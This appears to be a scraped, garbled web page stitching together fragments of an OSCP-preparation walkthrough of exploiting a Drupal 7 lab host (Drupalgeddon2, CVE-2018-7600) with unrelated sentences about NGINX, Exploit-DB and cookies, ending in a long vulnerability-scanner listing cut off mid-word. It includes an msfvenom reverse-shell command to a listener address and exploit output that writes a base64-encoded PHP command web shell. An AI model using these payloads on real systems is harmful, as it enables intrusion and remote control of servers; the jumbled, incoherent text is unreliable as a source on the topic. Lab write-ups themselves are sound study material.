It is wise to modify the default configuration of applications when hosted in a production environment. The main focus of this release was improving the Stream module, initially added in NGINX 1.9.0 for generic TCP proxying and load balancing. Drupal 7 … Greetings, in the last post in my OSCP preparation series we covered SolidState. producing different, yet equally valuable results. Long, a professional hacker, who began cataloging these queries in a database known as the I do notice, however, that the Drupal 7.x Module Services - Remote Code Execution exploit matches the article result from ambionics.com. As we can see, the output from this tool is quite large! If we recall the results from our searchsploit query earlier, we’ll notice that there are a number of available exploits that we could utilize against the version of Drupal that we are targeting: Since the OSCP exam greatly restricts the usage of the Metasploit Framework, we will not make use of Metasploit modules to exploit this vulnerability. 9/ Prepare the exam. The main advantage being that it can aid in keeping a low-profile when you have access to a system. This vulnerability exists in Drupal versions 7.x before 7.58, 8.3.x versions before 8.3.9, 8.4.x versions before 8.4.6, and 8.5.x before 8.5.1. These property values affect the resulting rendering process and can be used to achieve an AJAX response from the API which serves the rendered requested resource. Drupwn claims to provide an efficient way to gather drupal information. This vulnerability was made public on March 28th, 2018 by the Drupal core security team in a security advisory titled SA-CORE-2018-002, which details a remote code execution vulnerability identified as CVE-2018-7600. The exploit puts a file with random characters with a .ico extension and places an index.php permissions 0755 with an include to the .ico in every directory and sub directory of the site from public_html. Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution … compliant. Security updates were released for the Drupal 7, 8, and 9 versions to correct the file upload sanitization procedures. [!] Hackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of working exploit code. While it is still effective against older versions of Windows, it is not advised to use this against more modern versions of the operating system. Now that we are aware of the exact version of Drupal running on the target, we now have enough information to begin our exploitation process! In Drupal 7, this API was expanded to include a new construct known as ‘Render Arrays’. It is currently the 150th most used plugin of Drupal, with around 45.000 active websites. 7 CVE-2017-6932: 601: 2018-03-01: 2018-03-22: 5.8. I have been inundated with trolls around the world because of the lastest Drupal exploit. Search EDB. For those preparing for the OSCP exam, the use of Metasploit is avoided if possible. Today, the GHDB includes searches for Enumeration CMS web application; Writeups. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Shellcodes. Lastly, when attacking Windows systems, the ‘windows-exploit-suggester’ tool can greatly aid in your ability to discover vulnerabilities that may impact the target machine. Displaying 207 of the 207 vulnerabilities found. Often, these vulnerabilities may lead to privilege escalation when exploited. Let’s check if our compromised user has these rights: Excellent! We now have remote code execution on the target machine! It exploits a SQLi (SQL injection) vulnerability in order to add a new administrator user to the Drupal site. and usually sensitive, information made publicly available on the Internet. Papers. 7 CVE-2017-6932: 601: 2018-03-01: 2018-03-22: 5.8. If you continue to use this site we will assume that you are happy with it. I therefore propose to list you by the various resources that helped me to prepare myself and that I found particularly relevant or even essential during the lab! Before we fire off our exploit, let’s first analyze what conditions cause this vulnerability and how our exploit leverages this to achieve remote code execution. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). Objectives . We will continue by invoking the MSFVenom command and configuring it to create a payload that is suited for our target system: msfvenom –platform Windows -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52 LPORT=443 -e x64/xor_dynamic -a x64 -f exe > shelly.exe, Found 1 compatible encodersAttempting to encode payload with 1 iterations of x64/xor_dynamicx64/xor_dynamic succeeded with size 510 (iteration=0)x64/xor_dynamic chosen with final size 510Payload size: 510 bytesFinal size of exe file: 7168 bytes. If --authentication is specified then you will be prompted with a request to submit. Once our script is placed on the remote host, we can use our script(s) in conjunction with manual enumeration to acquire as much information as possible about the target system. Drupal 7.x Module Services - Remote Code Execution EDB … On Drupal 7 sites with the update status module, Drupal Core will show up as unsupported. In our second approach, we can utilize MSFVenom to generate an executable that will send us a reverse shell when ran. 9 CVE-2018-7600: 20: Exec Code 2018-03-29: 2018-06-11: 7.5. Services allows you to create different endpoints with different resources, allowing you to interact with your website and its content in an API-oriented way. Using windows server 2008 r2, iis 7.5 and .net 4.0, you can ensure end users get a compelling page while … Personally, I tend to habitually compress binary files before attempting a file transfer. PWK PEN-200 ; ETBD PEN-300 ; AWAE WEB-300 ; WiFu PEN-210 ; Stats. GHDB. I need to know to which master node my current worker node is connected. With this in mind, it appears that the ‘Drupalgeddon2’ remote code execution exploit will be suitable for attacking our Drupal 7.54 installation: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 – ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb. The developers of the Drupal content management system (CMS) released out-of-band security updates right before Thanksgiving due to the availability of exploits. Given that binary files can often be quite large, transferring these files across a network or writing them to a system’s drive, can potentially attract attention. About Exploit-DB Exploit-DB History FAQ Search. 12) of Drupal. Online Training . - Added menu tree render structure to (pre-)process hooks for theme_menu_tree() Let’s explore how we can leverage our code execution to gain a shell on the system. It is crucial to ensure that software is regularly updated so that these vulnerabilities are patched. show examples of vulnerable web sites. - File validation error message is now removed after subsequent upload of valid This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. CVE-2014-3704CVE-113371CVE-SA-CORE-2014-005 . We use cookies to ensure that we give you the best experience on our website. To start, we’ll transfer over some nifty enumeration scripts to our target in order to aid with our enumeration process. Firstly, I can say with confidence that you will most likely encounter this type of obstacle during both your OSCP exam and real-world engagements. Two weeks ago, Drupal security team discovered a highly critical remote code execution vulnerability, dubbed Drupalgeddon2 , in its content management system software that could allow attackers to completely take over vulnerable websites. First to check if a PHP web shell is present on the host, if not it will then attempt to write one to the target: Lastly, if a shell is unable to be written to the target host, the exploit will serve us an interface that can be utilized to submit further payloads to the target. About Us. After November 2021, using Drupal 7 may be flagged as insecure in 3rd party scans as it … In addition, it is also good practice for exploring how to achieve reverse shells on Windows systems. Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access?– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – [*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)[i] Response: HTTP 404 // Size: 12– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – [*] Testing: Writing To Web Root (sites/default/files/)[*] Moving : ./sites/default/files/.htaccess[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php[!] subsequently followed that link and indexed the sensitive information. In future posts, we will discuss Windows file transfer methods in length. Two methods are available to trigger the PHP payload on the target: - set TARGET 0: Form-cache PHP injection method (default). It exploits a SQLi (SQL injection) vulnerability in order to add a new administrator user to the Drupal site. Searching the web for “Drupal 7.54 exploits” returns an RCE exploit as the first result. Both of the tools mentioned can be found at the following links: https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester, python wes.py bastard_sysinfo.txt | tee bastard_vulns_wesng.txt, Date: 20110712CVE: CVE-2011-1282KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1283KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1281KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1285KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110412CVE: CVE-2011-0657KB: KB2509553Title: Vulnerability in DNS Resolution Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111213CVE: CVE-2011-3406KB: KB2621146Title: Vulnerability in Active Directory Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory Lightweight Directory ServicesSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2011-3402KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2011-3402KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2011-3402KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111213CVE: CVE-2011-3408KB: KB2620712Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1869KB: KB2535512Title: Vulnerabilities in Distributed File System Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110614CVE: CVE-2011-1894KB: KB2544893Title: Vulnerability in MHTML Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110913CVE: CVE-2011-1984KB: KB2571621Title: Vulnerability in WINS Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120508CVE: CVE-2012-0181KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0181KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0181KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0180KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0180KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0180KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2007-0099KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0003KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0003KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110412CVE: CVE-2010-4701KB: KB2506212Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploits: http://retrogod.altervista.org/9sg_cov_bof.html, http://www.exploit-db.com/exploits/15839, Date: 20120814CVE: CVE-2012-2523KB: KB2706045Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: VBScript 5.8Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-2523KB: KB2706045Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: JScript 5.8Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110412CVE: CVE-2010-3974KB: KB2506212Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110308CVE: CVE-2011-0032KB: KB2479943Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120214CVE: CVE-2012-0149KB: KB2645640Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120612CVE: CVE-2012-0217KB: KB2709715Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploits: https://www.exploit-db.com/exploits/28718/, https://www.exploit-db.com/exploits/46508/, Date: 20130409CVE: CVE-2013-1338KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1338KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121211CVE: CVE-2012-1537KB: KB2770660Title: Vulnerability in DirectPlay Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110913CVE: CVE-2011-1991KB: KB2570947Title: Vulnerability in Windows Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20091013CVE: CVE-2009-2510KB: KB974571Title: Vulnerabilities in Windows CryptoAPI Could Allow SpoofingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: SpoofingExploit: n/a, Date: 20091013CVE: CVE-2009-2511KB: KB974571Title: Vulnerabilities in Windows CryptoAPI Could Allow SpoofingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: SpoofingExploit: n/a, Date: 20100608CVE: CVE-2010-1879KB: KB979482Title: Vulnerabilities in Media Decompression Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Asycfilt.dll (COM component)Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110308CVE: CVE-2011-0029KB: KB2483614Title: Vulnerability in Remote Desktop Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Remote Desktop Connection 7.0 ClientSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-2531KB: KB2716513Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft FTP Service 7.5 for IIS 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20121113CVE: CVE-2012-2531KB: KB2719033Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20121113CVE: CVE-2012-2532KB: KB2716513Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft FTP Service 7.5 for IIS 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20121113CVE: CVE-2012-2532KB: KB2719033Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20110111CVE: CVE-2011-0027KB: KB2419640Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Data Access Components 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110111CVE: CVE-2011-0026KB: KB2419640Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Data Access Components 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-3229KB: KB2207566Title: Vulnerability in SChannel Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1293KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1293KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100914CVE: CVE-2010-2729KB: KB2347290Title: Vulnerability in Print Spooler Service Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-3147KB: KB2423089Title: Vulnerability in Windows Address Book Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploits: http://www.attackvector.org/new-dll-hijacking-exploits-many/, http://www.exploit-db.com/exploits/14745/, Date: 20120508CVE: CVE-2012-0161KB: KB2604114Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0160KB: KB2604114Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111108CVE: CVE-2011-2016KB: KB2620704Title: Vulnerability in Windows Mail and Windows Meeting Space Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0162KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0162KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0162KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0165KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0165KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0165KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0164KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0164KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0164KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0167KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0167KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0167KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-3338KB: KB2305420Title: Vulnerability in Task Scheduler Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121113CVE: CVE-2012-1527KB: KB2727528Title: Vulnerabilities in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1524KB: KB2719177Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1522KB: KB2719177Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20091013CVE: CVE-2009-2524KB: KB975467Title: Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1294KB: KB2813170Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121113CVE: CVE-2012-1528KB: KB2727528Title: Vulnerabilities in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2008-4033KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100810CVE: CVE-2010-2554KB: KB982799Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1868KB: KB2535512Title: Vulnerabilities in Distributed File System Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110208CVE: CVE-2011-0091KB: KB2425227Title: Vulnerabilities in Kerberos Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-2549KB: KB2765809Title: Vulnerability in IP-HTTPS Component Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20110208CVE: CVE-2011-0031KB: KB2475792Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: JScript 5.8Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110208CVE: CVE-2011-0031KB: KB2475792Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: VBScript 5.8Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20130409CVE: CVE-2013-2014KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2014KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1292KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1292KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1291KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1291KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1296KB: KB2813347Title: Vulnerability in Remote Desktop Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Remote Desktop Connection 7.0 ClientSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2013KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2013KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2730KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2730KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft 